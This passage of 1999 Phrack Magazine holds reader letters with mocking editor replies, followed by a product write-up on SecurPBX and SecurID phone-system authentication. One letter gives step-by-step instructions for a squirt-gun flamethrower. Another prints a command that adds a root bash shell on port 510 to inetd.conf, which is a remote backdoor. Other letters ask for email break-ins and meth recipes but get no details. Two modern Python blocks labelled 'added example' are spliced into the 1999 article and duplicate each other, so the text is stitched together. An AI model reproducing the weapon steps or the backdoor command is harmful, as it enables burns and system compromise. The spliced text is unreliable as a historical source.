your children drink bleach and ammonia and then jump up and down). ]
if you do it 2 or 3 times a day (or more) at different stores, you could
get $100.00 to $200.00 easily!!!
[ Or you could get a real job. ]
- con-x
0x19>-------------------------------------------------------------------------
hi there!
[ WELL HELLO THERE! ]
Can you say to me what type of language have you used to make your counter
code?
[ Hrm. I dunno. My counters are all made out of little tiles. ]
Better, can you send to me this code for my experiements...
[ Not really. I have my computer hooked up to an abacus. Don't ask.
It's complicated. ]
Thanks for all
0x1a>-------------------------------------------------------------------------
Hello, friends, I want to congratulate you and tell you go on, your stuff
is the best.
[ DAMN FUCKING RIGHT! ]
I need some directions of www where I can find information about phreaking
in Spanish, so I can read it more easily.
[ Well... Let's see.. There's the Lambada, the forbidden dance...
It's pretty freaky and scandalous.. Of course you can't go wrong
with some Ricky Martin! I hear the Latin women go bonkers for this
guy! Positively nutso freaky jiggy! ]
Thank you very much, continue with your job!!
[ FULL STEAM AHEAD! ]
Rodrigo
0x1b>-------------------------------------------------------------------------
Storm# fake -s xxx.254.160.11 'echo /etc/inetd.conf >> 510 stream tcp
nowait root /bin/bash /bin/bash -i -s'
Starting the remote shell exploit ...
done!
Storm# fake -s xxx.254.160.11 'echo killall -HUP inetd'
Starting the remote shell exploit ...
done!
Storm# telnet xxx.254.160.11 510
bash#
[ Hey. Great. Fake logs of someone not breaking into a false machine.
CAN YOU SPOT THE ERROR! ]
0x1c>-------------------------------------------------------------------------
hey there in one of your first articles in issue 2 or 3 you mentioned blow
guns well i have a few improvements that can be used to make them more
durable/lethal. such as easy to make poisons (numbing/sleeping/etc.) made
from everyday herbs (tried and true) farther range and ease of use.
[ OOOOOk. Rite. Just where do you people come from? Seriously.
Are you bred in some underground laboratory, run _by_ retards, _for_
retards? ]
them implication are easy to see such as annoying dogs being put to sleep etc
etc... :-) write back if you want some directions
[ `them implication`? Ah, let me guess. You're from the South, you
never went to school because you were `educated` at home by your
cousin-mother. If the natural selection club doesn't weed you out
first, I'm sure you'll do it on your own somehow. ]
0x1d>-------------------------------------------------------------------------
I have been reading phrack for some time now and am completely pissed
off with the total lack of good hacking suggestions.
[ This isn't a fucking craft store. Don't expect us to assemble the thing
just so you can paint it and say it's yours. ]
I have tried to implement a number of these ideas, and they just don't work
against my web site (http://www.XXX.govt.nz) even though it is on NT and is
protected with a minimal amount of security behind a borderware 5 firewall.
[ "Hi. I'm coyly trying to get a site targeted that isn't my own". ]
perhaps you can try and hack my web site and prove me wrong!
[ Perhaps I can try and dig for oil in my backyard! Not likely. ]
yours in frustration
[ Mine in ambivalence. ]
- Brian A. Scott
Internet Security Consultant
[ No you're not. ]
0x1e>-------------------------------------------------------------------------
Alright, a device I thought up that I have never seen plans for online
(save my own shitty pages) is called the airhorn grenade. Basically,
all that it is is an ordinary airhorn with some tape over the trigger so
that it can be thrown into someone's yard, preferably at night, and wake
up the whole goddamn neighborhood while giving you ample time to
run/drive/bike a long distance away from the whole scene. Dogs will bark,
police will be called. Try to toss it into some bushes or other
inaccessible area. This may not be the most interesting and complex
text, but I have faith that it is the first to document the simple as
hell airhorn grenade. I'm sure many people could have thought this up
themselves, but then I guess someone would have written about it. Oh
well. Have fun, and orcae ita.
[ MY GOD THAT'S BRILLIANT! Take a cut out of petty cash and buy
yourself something special! Tape! Who would have ever thought
of something so elegantly absurd! GENIUS! The simplicity is
absolutely amazing and at the same time subtly obtuse! Yes! WAIT!
It's more than that! It's actually less like genius and more like
the idea and/or sensation of slamming your penis in a dictionary or
some other large manual. ]
0x1f>-------------------------------------------------------------------------
not really sure how to address you...
[ The Sultan of love. ]
I have made a big mistake.
[ If you're here, you must have done something wrong! ]
I crashed my computer without having any information on how to bring it back
up.
[ Did you try an encyclopedia? They have lots of good information! ]
My computer doesn't want to access the cmos or anything but the a-drive.
[ Well, you need to show it who's boss! This is the `break-in` process
where you make it your bitch. Just keep slappin' until it learns. ]
I have contacted zenith data systems and they don't have the disks anymore.
[ BASTARDS! ]
If you or anyone you know has some type of disk or file or any
information on how I can bring this computer back up. I would really
like to do it myself. You know to see if I can.???
[ Yes, let me consult my vast database of CMOS burning utilities.
Give me some time, it's kept over at my mansion in the Hamptons. ]
Thank you for your time and expertise.
Sincerely,
- Mitch Rhymer
[ Dude, is that your hip-hop name, or your real name? ]
0x20>-------------------------------------------------------------------------
Hi, I recently visited your site and was amazed at the information and
articles you had archived. I am a man of curiosity and am in search of
information that the government would rather an "average" citizen not have.
I am not a Fed or any type of law officer or such, I am truly just
interested in obtaining "security" of my liberty. Most the stuff on your
site is Greek to me, (hacking systems, etc.). Do you know of any great
sites that are controversial that inform the average Joe. I found your page
by searching "anarchy." Let me give you an example of what I am looking for
and maybe that will help you since my request is so broad. The government
would rather all of the citizens not own guns, bombs, etc., (in fact, I
believe the whole David Koresh/Waco, Texas thing was because Big Brother
was uneasy with the arms they were storing). I don't need conspiracy
groups, but I want as much info as I can get before the Government starts
regulating us over the internet - and you know it will soon come to that!
Thanks if you can help!
- Darryl
[ Ok. Darryl. I want to talk to you for a minute. Yes, it's ok..
C'mon out from under the bed. Put down the flashlight and take the
pot off your head. It's time you come to terms with the delusional
episodes that tear through your life. They're ruining your otherwise
mundane life. Your father and I are going to get you back on your
program. Yes. I know. The shots hurt, the medicine tastes horrible
and the shock therapy is rough. But it IS for your own good. We
just don't want another breakdown like the time you held Ms. Lancaster
hostage for 3 days because you thought she was 'stealing your
thoughts'. ]
0x21>-------------------------------------------------------------------------
if you have can you send me illegal credit card number ?
[ Try: 8921-129-123939-989450-129586-98489-129094-09102-03209-3.
Expires 05/03. ]
thanks
- jeremy15
0x22>-------------------------------------------------------------------------
hi.. i wonder if you could take time to answer a question for me, it would be
most appreciated.. I was contacted by a girl on ICQ and she asked if she
could send me a picture.. after the picture had been sent, this girl proceeded
to tell me what i had on my desktop, which sites i had visited, what files i
had on my computer, then she started deleting files from my hard drive... can
you tell me how she got access to my computer and how i can stop this in
future..
[ Jesus H. Christ. This just goes to show you... If I've said it
once, I've said it 1000 times: STAY THE HELL AWAY FROM GIRLS ON
IRC/ICQ/AOL CHATROOMS. Lord knows I've learned MY lesson. ]
many thanks
- A.Bramley
0x23>-------------------------------------------------------------------------
Will you help me?
[ In all likelihood, no. ]
E-mail back and I will give the info you need to assist me.
[ I have all the info I need right here --> > . <. ]
It is crucial that I get help. My schooling depends on it.
[ This sounds like a job for "SHOULD HAVE FUCKING STUDIED". ]
MESS WITH THE BEST DIE LIKE THE REST!!
[ You're so going to be on welfare when you get older. ]
- ACIDBURN
[ Elite handle `cos it's true! ]
0x24>-------------------------------------------------------------------------
i'm sorry if i have written to the wrong person.
[ Hey man, if you've made it here, you're definitely talking to the
right guy. ]
but i really need help hacking into someone's personal computer. they have
some info in their icq programme and their e-mail about me that will
eventually screw me over.
[ Well, that's what you get when you netsex little boys and girls.
Shame on you Richard. ]
i just need to know how i can access their comp to either wipe out the entire
hard drive or just the desired info.... i have the e-mail address of the
person mentioned and their ip number..that is it...please help if you can....
- richard
0x25>-------------------------------------------------------------------------
you know your phrack archive article no.2, p2-4? (the one on blowguns by
the pyro.) i have no idea on how to make the darts right. i read the phile
over, and over, but i can't get a picture in my mind on what to do next,
can you please tell me where i can get some pictures
[ Ok. How about this: >oo-- Or this one: }==> ]
or something that can tell me better?
[ Do you mean like a priest? ]
or if not, can u help me? i would really appreciate it...thanx for your time!
0x26>-------------------------------------------------------------------------
congrats on the great page, (as if you don't hear that enough) i read you made
it to tv, will that heighten security on your page? most places have
disclaimers saying if you don't meet the standards don't enter,
[ We have one saying `you must be this tall to hack this site`. And
then there's a jpeg of a midget holding a pickle. ]
i find yours doesn't, i was wondering if you being on tv, could risk you losing
the page,
[ Well, I kept it throughout my 18 month stint on `The Facts of Life`
so I don't see why this should be any different (I played Tootie's
boyfriend who had a secret life as a gay circus animal trainer.
Towards the end of the last season though, ratings dropped so they
had me eaten by a bitchy llama). ]
try not to make me look like a total ass
[ I can only do so much, Ben. ]
- ben
0x27>-------------------------------------------------------------------------
hi my name is Zero X9. I am in desperate need of help.
[ Bro, go to a doctor. Rashes 'down there' are nothing to fool around
with. You'll know better to 'look not touch' next time you see a dead
animal. ]
i have a computer swiped from a local school that has At Ease on it. i
either need a place to get an overwrite password or Dis Ease 1.0.
[ My advice is to return the computer you fucking vandal. ]
Thank you for your time.
Sincerely,
- Zero X9
0x28>-------------------------------------------------------------------------
I wonder if you guys can help me. I'm trying to hack into a certain
individual's e-mail --I have everything I need -- except the password
and unfortunately I Don't know an easy way to generate the correct one
Is it possible to get in through the web?-- I do not have direct access
to the server--only a dial up connection.
[ SWEET FUCKING CHRIST MAN! DO YOU THINK IT'S JUST THAT EASY? If it was
we wouldn't be making the millions we do and sexing up super models.
FUCK. DON'T TRIVIALIZE IT. ]
PLEASE
Can you help me.
[ Get a job. ]
0x29>-------------------------------------------------------------------------
this is how to make a flame thrower out of a squirt gun
[ This is how to set yourself, your sister and your shanty on fire. ]
items:
super soker (doesn't matter just use what you have or wanna get)
[ Huh? What I have or wanna get? That's a pretty vague instruction.
I want my money back, this kit is bunk. ]
gas/or flamable liquid
a lighter (the grill ones that have the red handle and the long black thing at
the end)
[ Hrm. I thought the long black thing with the red handle was something
else. Maybe I'm thinking of some other prod-like instrument. ]
tape
how to make:
its easy!!! tape the lighter to the barrel part of the squirt gun (where ever
it fits best) fill the squrit gun with the flamableliquid of your choice
and its done
how to use:
pump it up press the button on the lighter(so it turns on thats a givin)
then point shoot
tip: use oil to make it thicker (not too thick or it won't come out) and
it
will stick better to where you shoot it
0x2a>-------------------------------------------------------------------------
Hi I love your magazine, and hacking a lot, so instead of calling myself a
hacker I call myself a Phracker may i have the permission to do that, please?
[ No. Go rm yourself. ]
0x2b>-------------------------------------------------------------------------
Goog morning!
[ Goog afternoog! ]
Sorry for my very-bad-english: that's because I'm mailing from Spain,
[ That's still no excuse. Even that Spaniard from the Princess Bride
spoke pretty good English, and he spent his whole life sword-fighting. ]
where people speak a strange language called Spanish.
[ Other people's cultures are funny! ]
OK, now I've learned some new words, appart from fuck, shit, ass, snot,
and milk twice,
[ I see they're pretty up to date there in European schools! ]
so I think in this moment I'm able to send you this apocalyptic mail.
[ Oops! Moment's passed. Email is now slightly less than dire, and
maybe a tiny bit foreboding. ]
Well, i'm searching some revolutionary method to produce a substance
called speed (metamphetamine)
[ Dude, didn't you see that movie "Go"? All you need is to sell aspirin
and cold tablets to thick-headed suburban kids. ]
beggining from a nose inhalator (Vicks in my country), and I've listened
somewhere that is explained in a magazine called "Prhack".
[ Prhack is our marketing arm. They take care of all of the t-shirts
mugs, mouse-pads, feeted pajamas, muzzles, and garrote wire. ]
I haven't found this name in a magazine so I guess that should be the
incredible "Phrack" Magazine. Is it true?
[ No, no, no, Phrack is widely touted as `inedible`. ]
If the answer is afirmative, please tell me in what number appears, or
directly the explanation.
[ Magic 8-ball says `0`. ]
Thank you very much!!!
0x2c>-------------------------------------------------------------------------
Exactly who is this loser who has nothing better to do than screw with people
trying to earn a living??
[ Initially, I had no idea what the F you were talking about. So, in
the interest of time-wasting, I dug a bit. The article you refer
to, but conveniently don't quote or mention, is P45-19. Next time,
at least drop a URL to the article in question. I now have no choice
but to ridicule you. Granted, I probably would have done it either
way, but now I feel justified. ]
I realize that this is an old, archived article, but come on.
[ Well then maybe you should have quoted or referenced it in some way
so people would know what the hell you are talking about. ]
This stuff is asinine, petulant, childish,
[ You forgot fatuous, fractious and puerile! And smackdab-u-licious! ]
"I'm pissed off at the world because my daddy didn't buy me a BMW" shit!
[ I'm pissed at the world because no one has taken my idea for using
hair as currency seriously. I mean, think about it.. We could
all grow our way into financial independence! Of course the alopecians
among us would be a bit impoverished... We could make them our
slaves! ]
And the part in the last paragraph about "molesting kids in the playland"
reveals his pedophilic nature.
[ Maybe he meant `bolstering kids in the playland`. So, in actuality
he was completely supportive of their whimsical nature. That's what
I think he meant. ]
Maybe he should be placed in the local "pen" and have "Bubba" teach him
all about the birds and the bees.
[ FOUL! Unnecessary use of excessive quotation. 100 yard penalty. ]
Oh, and nice disclaimer, by the way.
[ Thanks man. I worked on it myself. ]
Releasing yourself from legal ramifications does nothing for the moral side
of the issue.
[ Morals are subjective and vary from person to person. ]
Are you pedophiles??
[ I'm an audiophile. Is that the same thing? ]
Is John Wayne Gacy on your staff??
[ John Wayne Gacy is dead, moron. Furthermore, I do believe Gacy was a
bit more than a pedophile. He murdered 33 people. Phrack staff
collectively have only about 7 under their belts. ]
Entertainment purposes?? Who the hell are you trying to entertain??
[ Ourselves first. Everyone else, second. ]
Cybergeeks whacking off to pictures of six year olds??
[ Hey man, what you do on your own time is your own thing. We at Phrack
subscribe to the `don't ask and for the love of god don't tell` policy.
You sick, sick man. ]
Claim no responsibility??
[ With Freedom comes responsibility. ]
Then why the hell post the article?
[ *shrug* I didn't. Look at the date. It's more than 5 years old.
Who the hell are you ranting to? Certainly no one that cares.
I wasn't even at the helm back then. Cry someone else a river. ]
Draw the line. There is no comedic value in telling people to "molest"
children just to piss off McDonald's restaurant. If he doesn't like the
place, DON'T FUCKING GO THERE!!!!! And don't publish articles of this
nature if you don't want to be grouped with the author as an advocate of
twisted behavior.
[ If YOU don't like the magazine or its contents, DON'T FUCKING READ IT. ]
------------------------------------------------------------------------------
----[ EOF
-------[ Phrack Magazine --- Vol. 9 | Issue 55 --- 09.09.99 --- 03 of 19 ]
-------------------------[ P H R A C K 5 5 L I N E N O I S E ]
--------[ Various ]
0x01>------------------------------------------------------------------------
SecurPBX using SecurID
by pbxphreak <chris@lod.com>
.---------------.
| | 037592 |
| `--------'
| SecureID |
`---------------'
SecurID Token:
-------------
The SecurID token provides an easy, one step process to positively identify
network and system users and prevent unauthorized access. Used in conjunction
with Security Dynamics Server software, the SecurID token generates a new
unpredictable access code every 60 seconds. SecurID technology offers
crackproof security for a wide range of platforms in one easy-to-use package.
Highlights:
----------
- Easy, one-step process for positive user authentication
- Prevents unauthorized access to information resources
- Authenticates users at network, system, application or transaction level
- Generates unpredictable, one-time-only access codes that automatically
change every 60 seconds
- No token reader required; can be used from any PC, laptop or workstation,
ideal for remote access and Virtual Private Networks
- Works seamlessly with ACE/Agent for secure Web access
- Tamperproof
The Solution:
------------
For a sophisticated hacker or a determined insider, it doesn't take much to
compromise a user's password and gain access to confidential resources. And
once an unauthorized user enters a supposedly secure system, all privilege
definition and audit trail functions become virtually meaningless... in
essence, the damage is done. Single-factor identification, a reusable
password, is not enough.
To identify and authenticate an authorized system user, two factors are
necessary. Factor one is something secret only the user knows: a memorized
personal identification number (PIN) or password. The second factor is
something unique the user possesses: the SecurID token.
Carried by authorized system users, SecurID tokens, available in three models,
generate unique, one-time, unpredictable access codes every 60 seconds. To
gain access to a protected resource, a user simply enters his or her secret
PIN, followed by the current code displayed on the SecurID token.
Authentication is assured when the ACM recognizes the token's unique code in
combination with the user's unique PIN. Patented technology synchronizes each
token with a hardware or software ACM. The ACM may reside at a host, operating
system, network/client resource or communications device: virtually any
information resource that needs security.
This simple, one-step login results in crackproof computer security that is
easy to use and administer. The tokens require no card readers or time-consuming
challenge/response procedures. With SecurID tokens, reusable passwords can no
longer be compromised. Most importantly, access control remains in the hands
of management.
SECURID PINPAD:
--------------
An added level of security can be implemented with a SecurID PINPAD token.
The PINPAD token enables users accessing the network to log in with an
encrypted combination of the PIN and SecurID token code. Using the keypad on
the face of the PINPAD token, a user enters his or her secret PIN directly
into the token, which generates an encrypted passcode. This additional level
of security is especially appropriate for users in application environments
who are concerned that a secret PIN might be compromised through electronic
eavesdropping.
SecurID tokens are ideal for any environment. The original SecurID token
conveniently fits into a wallet like a credit card. The SecurID key fob
offers a new dimension in convenience to those customers requiring high
levels of security in multiple environments, along with compact size and
durability. In addition to providing the same reliable performance in
generating random access codes as the original SecurID token, the SecurID key
fob comes in a small, lightweight format.
SecurPBX
--------
Ok. Plain and simple. SecurPBX is a product to protect PBX systems worldwide
and automated Help Desk functions.
SecurPBX provides remote access security for telephone lines, modem pools,
voicemail ports, internet access lines, and the maintenance port on PBX
systems. Used in conjunction with Security Dynamics SecurID, SecurPBX
protects valuable PBX resources from remote access by unauthorized callers
without compromising the conveniences of remote telephone and data access
to teleworking or traveling employees.
Callers dial specific numbers on the PBX for long distance services. As an
adjunct to the PBX and a client to the server, SecurPBX receives the
caller's request for resources. Functioning as a client, SecurPBX requires
remote callers to provide SecurID user authentication and an authorized
destination telephone number before being transferred to the desired resource.
SecurPBX transmits the credentials to the server for authentication
and simultaneously validates the telephone number against user-specific
permissions and denials. SecurPBX integrates with the PBX to process the
call based on the validity of the caller via SecurID and the destination
number attempted.
.----------. |
| SERVER |---- -x- <-- Security
`----------' |
| |
| _-_
.--------------. |
| | 037592 | ,-----.
| `--------' ----- | PBX | ----- .-----------.
| SecureID | `-----' | SecurePBX |
`--------------' | Switch |
| `-----------'
|
--------------- Users
Each SecurID card is a visually readable credit card sized token or key which
is programmed with Security Dynamics' powerful algorithm. Each card
automatically generates an unpredictable, one time access code every 60
seconds. The token is convenient to carry and simple to use and is resistant
to being counterfeited or reverse engineered.
SecurPBX extends the secure working environment of an organization to remote
locations. SecurPBX applies user specific calling restrictions before any
call is completed to prevent unauthorized toll charges and misuse of PBX
resources. The time of day, volume of calls per user, destination telephone
numbers (restricted to NPA and NXX) and customizable classes of service add
a vital layer to access security without compromising the convenience of
having remote access to telephone resources. SecurPBX logs all successful
and unsuccessful attempts including the destination telephone number.
Caller ID/ANI, if available, also provides the origination telephone number,
pinpointing the location of the caller.
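As an added example (not the vendor's or the author's code), here is a small Python model of the two checks the article describes: a PIN-plus-token passcode verified against a 60-second code, then NPA/NXX, time-of-day and per-user volume screening of the dialed number, with every attempt logged alongside the ANI. The code generator is an HMAC stand-in because the SecurID algorithm is proprietary; the fixed PIN length, the one-window drift tolerance, UTC hours, and all names, numbers and seeds are assumptions constructed for the demo.

```python
"""Toy model of SecurID two-factor login and SecurPBX call screening.
Constructed example: SecurID's code generator is proprietary, so a truncated
HMAC over a 60-second time step stands in for it.  Not the vendor's code."""
import hashlib
import hmac
import time
from dataclasses import dataclass, field

STEP = 60          # the article: a new code every 60 seconds
CODE_DIGITS = 6    # six-digit display, as in the token drawing
PIN_LEN = 4        # assumption: fixed-length PIN so "PIN + code" can be split


def token_code(seed: bytes, now: float) -> str:
    """Stand-in for the code on the token face during the 60-second window
    containing `now` (HMAC-SHA256 truncated to digits, NOT SecurID's algorithm)."""
    window = int(now // STEP).to_bytes(8, "big")
    digest = hmac.new(seed, window, hashlib.sha256).digest()
    value = int.from_bytes(digest[:4], "big") % 10 ** CODE_DIGITS
    return str(value).zfill(CODE_DIGITS)


@dataclass
class User:
    pin: str                   # factor one: something only the user knows
    seed: bytes                # factor two: the secret inside the token
    allow: set                 # NPA or NPA+NXX prefixes the user may dial
    deny: set = field(default_factory=set)  # prefixes refused even if allowed
    hours: tuple = (0, 24)     # permitted UTC hours [start, end); assumption
    max_calls: int = 10        # per-user call volume cap
    calls: int = 0


def digits_of(number: str) -> str:
    return "".join(ch for ch in number if ch.isdigit())


@dataclass
class SecurPBXModel:
    """The adjunct: authenticate the caller, then screen the destination."""
    users: dict
    log: list = field(default_factory=list)  # every attempt, pass or fail

    def verify_passcode(self, user, passcode, now):
        """PIN followed by the current token code, compared in constant time.
        Assumption: adjacent windows are accepted to absorb clock drift."""
        if len(passcode) != PIN_LEN + CODE_DIGITS or not passcode.isascii():
            return False
        pin, code = passcode[:PIN_LEN], passcode[PIN_LEN:]
        if not hmac.compare_digest(pin, user.pin):
            return False
        return any(hmac.compare_digest(code, token_code(user.seed, now + d * STEP))
                   for d in (-1, 0, 1))

    def destination_allowed(self, user, number):
        """NPA/NXX screening: a 10-digit number must match an allow prefix
        and no deny prefix (a denial wins, as a class-of-service rule would)."""
        d = digits_of(number)
        if len(d) != 10 or any(d.startswith(p) for p in user.deny):
            return False
        return any(d.startswith(p) for p in user.allow)

    def place_call(self, username, passcode, dest, ani=None, now=None):
        """Run the checks in order and log the attempt with destination and
        ANI, since the article says SecurPBX records both on every attempt."""
        now = time.time() if now is None else now
        user = self.users.get(username)
        hour = time.gmtime(now).tm_hour
        if user is None or not self.verify_passcode(user, passcode, now):
            reason = "auth-failed"
        elif not self.destination_allowed(user, dest):
            reason = "destination-denied"
        elif not user.hours[0] <= hour < user.hours[1]:
            reason = "outside-hours"
        elif user.calls >= user.max_calls:
            reason = "volume-exceeded"
        else:
            reason = "ok"
            user.calls += 1
        self.log.append({"user": username, "dest": digits_of(dest),
                         "ani": ani, "result": reason})
        return reason == "ok"


DEMO_NOW = 1_000_000_000   # fixed clock: 2001-09-09 01:46:40 UTC
DEMO_SEED = b"constructed-seed-not-a-real-token-secret"


def demo() -> list:
    """Returns the audit log from a few representative attempts; the seed,
    user, ANI and 555-01xx numbers are all constructed for this demo."""
    pbx = SecurPBXModel({"alice": User("1234", DEMO_SEED, allow={"540"},
                                       deny={"540900"}, max_calls=2)})
    good = "1234" + token_code(DEMO_SEED, DEMO_NOW)
    pbx.place_call("alice", good, "540-555-0123", ani="2025550100", now=DEMO_NOW)
    pbx.place_call("alice", "0000" + good[4:], "540-555-0123", now=DEMO_NOW)
    pbx.place_call("alice", good, "540-900-1234", now=DEMO_NOW)  # denied NXX
    pbx.place_call("alice", good, "540-555-0199", now=DEMO_NOW)  # 2nd ok call
    pbx.place_call("alice", good, "540-555-0199", now=DEMO_NOW)  # over cap
    return pbx.log
```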
Highlights of SecurPBX:
----------------------
- Compatible with all major PBX vendor types.
- Cost effective remote access security for PBX resources.
- Prevents unauthorized access to valuable voice and data resources.
- Secures remote long distance, and alternative method for replacing
calling cards.
- Works in conjunction with each users SecurID card.
- Centralized network authentication and security administration.
- Easy to Use, voice prompting available in multiple languages.
- Audit trails and reporting assure true caller accountability.
- Caller ID/ANI option provides originating telephone number identifying
hacker locations.
SecurPBX operates in the Microsoft Windows NT environment. Callers and data
users achieve seamless access to PBX resources with validation data gathered
as efficiently as using a calling card and/or attempting a standard logon
procedure. In many cases, SecurPBX can be a calling card replacement and
may also be used with cellular phones to combat calling card fraud.
Fraudulent or suspect callers are denied access before toll charges and
resource damage occur.
Typically, securing a PBX from unauthorized remote access has required
disabling remote access to the PBX. Using dynamic, two factor authentication
through the server and validation of the destination numbers dialed, SecurPBX
systematically locks out unauthorized callers, preventing toll, voicemail,
and data fraud. This provides a secure access point for
teleworking resources.
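The brochure text above describes the flow in words: a token code that changes
every 60 seconds, PIN plus token as two factors, destination restrictions by
NPA/NXX with denials overriding permissions, time of day and per-user volume
limits, and a log line for every attempt. The following is an added example
of that authorization flow written for this page; it is not SecurPBX or
Security Dynamics code. The token code is a generic HMAC time-step code
standing in for the proprietary SecurID algorithm, and the user policy, the
seed, the caller, the ANI and the destination numbers are all constructed.

```python
"""Call authorization in the style of the SecurPBX description (added
example, not vendor code). Token scheme, policy and data are assumptions."""
import hmac
import hashlib
import struct
from dataclasses import dataclass
from datetime import datetime, timezone

STEP = 60  # the brochure says the token code changes every 60 seconds


def token_code(secret: bytes, t: int) -> str:
    """Six-digit HMAC time-step code for epoch second t (assumed scheme,
    stands in for the proprietary SecurID algorithm)."""
    counter = struct.pack(">Q", t // STEP)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    val = struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF
    return f"{val % 1_000_000:06d}"


def verify_token(secret: bytes, code: str, t: int, skew: int = 1) -> bool:
    """Accept the current step plus/minus `skew` steps to tolerate clock
    drift between token and server; constant-time compare on each."""
    return any(hmac.compare_digest(token_code(secret, t + d * STEP), code)
               for d in range(-skew, skew + 1))


@dataclass
class UserPolicy:
    pin: str                # factor one: something the user knows
    secret: bytes           # factor two: seed of the token the user holds
    hours: tuple            # (first_hour, last_hour) in which calls are allowed
    allowed: set            # NPA ("415") or NPA+NXX ("212555") prefixes
    denied: set             # denials take precedence over permissions
    max_calls: int          # volume cap per user per day
    calls_today: int = 0


def destination_permitted(policy: UserPolicy, dest: str) -> bool:
    """Restrict by NPA and NXX: a deny on either prefix wins."""
    digits = "".join(ch for ch in dest if ch.isdigit())
    npa, npa_nxx = digits[:3], digits[:6]
    if npa in policy.denied or npa_nxx in policy.denied:
        return False
    return npa in policy.allowed or npa_nxx in policy.allowed


def authorize_call(users, user_id, pin, code, dest, now: datetime,
                   ani=None, log=None):
    """Two-factor check, then user-specific calling restrictions.
    Returns (allowed, reason) and appends one audit line per attempt."""
    t = int(now.timestamp())
    policy = users.get(user_id)
    if (policy is None or policy.pin != pin
            or not verify_token(policy.secret, code, t)):
        reason = "auth-failed"          # do not reveal which factor failed
    elif not (policy.hours[0] <= now.hour <= policy.hours[1]):
        reason = "outside-hours"
    elif policy.calls_today >= policy.max_calls:
        reason = "volume-exceeded"
    elif not destination_permitted(policy, dest):
        reason = "destination-restricted"
    else:
        reason = "ok"
        policy.calls_today += 1
    allowed = reason == "ok"
    if log is not None:                 # successful and unsuccessful attempts
        log.append(f"{now.isoformat()} user={user_id} dest={dest} "
                   f"ani={ani or '-'} result={'ALLOW' if allowed else 'DENY'} "
                   f"reason={reason}")
    return allowed, reason


# Constructed sample user: allowed 08-18h, NPA 415 or NPA+NXX 212-555,
# 900 numbers denied, two calls per day.
USERS = {"jsmith": UserPolicy(pin="1234", secret=b"constructed-seed",
                              hours=(8, 18), allowed={"415", "212555"},
                              denied={"900"}, max_calls=2)}


def demo():
    """Five constructed attempts; returns their reasons and the audit log."""
    log = []
    now = datetime(1999, 9, 9, 14, 0, tzinfo=timezone.utc)
    good = token_code(USERS["jsmith"].secret, int(now.timestamp()))
    attempts = [("1234", good, "415-555-0100", "2125550199"),
                ("1234", "xxxxxx", "415-555-0100", None),   # bad token code
                ("1234", good, "900-555-0100", None),       # denied NPA
                ("1234", good, "212-555-0100", None),       # allowed NPA+NXX
                ("1234", good, "415-555-0101", None)]       # over volume cap
    reasons = [authorize_call(USERS, "jsmith", pin, code, dest, now, ani, log)[1]
               for pin, code, dest, ani in attempts]
    return reasons, log


if __name__ == "__main__":
    for line in demo()[1]:
        print(line)
```

The order of the checks matters: authentication failures are logged with a
single generic reason so a caller cannot learn whether the PIN or the token
was wrong, and the volume counter is only incremented for calls that are
actually placed.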
SecurPBX unique voice identification:
-------------------------------------
SecurPBX is a unique identification solution providing secure remote
access to all major PBX or Centrex telephone systems. Protected resources
include:
- Long distance lines and trunks
- Voice mail access lines
- Call centers
- Interactive voice response systems and audio response units
Access is controlled through positive identification of callers by their
unique, individual voice prints. SecurPBX uses SpeakEZ voice print speaker
verification technology to efficiently allow access to authorized
callers while eliminating access to unauthorized callers. The SpeakEZ
voice print system is recognized as the best in the voice verification
industry today.
Significant investments in telephone resources simply cannot be protected
by traditional static passwords or PINs. When making a telephone call from
any telephone using your calling card number, the one condition the PBX or
phone company can verify as certain is that someone is making a call with
a known authorization code; however, it could be anyone. Casual calling by
unauthorized personnel, recognized as a major misuse of corporate telephone
resources, must be controlled if not eliminated. SecurPBX provides that
capability to your organization.
SecurPBX provides reliable, independent two factor user identification and
authentication. Factor one is something the user knows: a memorized personal
identification number or password. The second factor is something unique
the user possesses: his/her own voice print. Each caller is required
merely to speak his/her chosen password, which is compared to a stored voice
print. The password can be in any language or dialect.
SecurPBX extends the unique user authentication provided by SpeakEZ voice
print to include user specific calling restrictions. Time of day, volume of
calls per user, destination telephone numbers which are restricted to NPA
and customizable classes of service add important layers of access security
without compromising the convenience of remote access to telephone resources.
Highlights:
----------
- Compatible with all major PBX vendor-types and Centrex
- Cost effective remote access security for PBX resources
- Prevents unauthorized access to valuable voice resources
- Secures remote long distance
- Non-intrusive security, callers are validated by their own voice prints
- Language independent passwords
- Centralized authentication and security administration
- Easy to use, voice prompting available in multiple languages
- Audit trails and reporting assure true caller accountability
- Multiple voice prints available per user
Remote Access Security Solution:
-------------------------------
Optionally, after authentication, SecurPBX administrators can manage user
permissions and denials from either the same SecurPBX workstation or from
another workstation connected via a LAN or remotely by modem in a Windows
friendly environment.
Long distance callers achieve seamless access to PBX outbound trunks with
validation criteria gathered as efficiently as a calling card and as easily
as talking to a telephone attendant. Fraudulent or suspect callers are denied
access before any damaging toll charges can occur.
SecurPBX logs all calls, successful and unsuccessful, including the date and
time, user ID, and destination telephone number. Depending on the PBX type,
Calling Line Identification ANI may be used as part of the validation process
and in those cases, will also be logged. Log information can be exported to an
external spreadsheet application or displayed in reports generated by the
SecurPBX Administrator.
SpeakEZ Voice Print:
-------------------
SpeakEZ Voice Print Speaker Verification is a highly effective method of
confirming a caller's identity. The service is based on the fact that each
person's voice is uniquely different, and, as a means of identification, is
highly reliable. Speaker Verification is an application of the SpeakEZ Voice
Print technology which compares a digitized sample of a person's voice with
a stored model "voice print" of that individual's voice for verification.
- Authenticates the caller as opposed to information (i.e. PIN) or a piece
of equipment.
- Easy to use, language independent
- Safe: a voice print cannot be lost or stolen
- Cost-effective: does not require special hardware for the caller
- Virtually fraud-proof: a voice is difficult to forge
Applications of SecurPBX:
------------------------
- Secure Telecommuting (all valuable PBX resources)
- Call center user authentication
- Securing Interactive Voice Response (IVR) and Audio Response Units (ARUs)
- Help Yourself suite of products for help desk automation (ASAP(TM) -
ACE/Server Administration Program - PIN reset, SecurNT - Windows NT
password reset, E-Help Desk - Entrust/PKI(TM) profile recovery)
Technical Requirements:
----------------------
Telephony platforms : All major PBXs including Nortel, AT&T, Rolm and Mitel
Processor           : 100% IBM compatible PC, Pentium 133 minimum
Disk requirement    : Hard disk 1 gigabyte minimum, 32MB RAM for Switch
                      Interface, Client software, 8 MB for Administrator
                      software, actual storage based on size of user
                      population
Capacity            : An unlimited number of users may be administered and
                      issued SecurID Cards. 32 simultaneous voice channels
                      per Switch Interface
